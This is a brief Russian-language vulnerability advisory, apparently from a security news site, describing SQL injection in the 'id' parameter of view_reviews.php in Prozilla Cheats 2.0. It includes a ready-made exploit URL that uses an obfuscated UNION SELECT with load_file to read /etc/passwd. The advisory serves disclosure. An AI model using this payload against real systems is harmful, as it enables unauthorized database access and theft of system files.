Программа: Prozilla Cheats 2.0

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием view_reviews.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://www.example.com/view_reviews.php?id=-1/**/UNION/* */ALL/**/SELECT/**/1,2,load_file(‘/etc/passwd’),4,5,6,7,8,9/*



Оставить мнение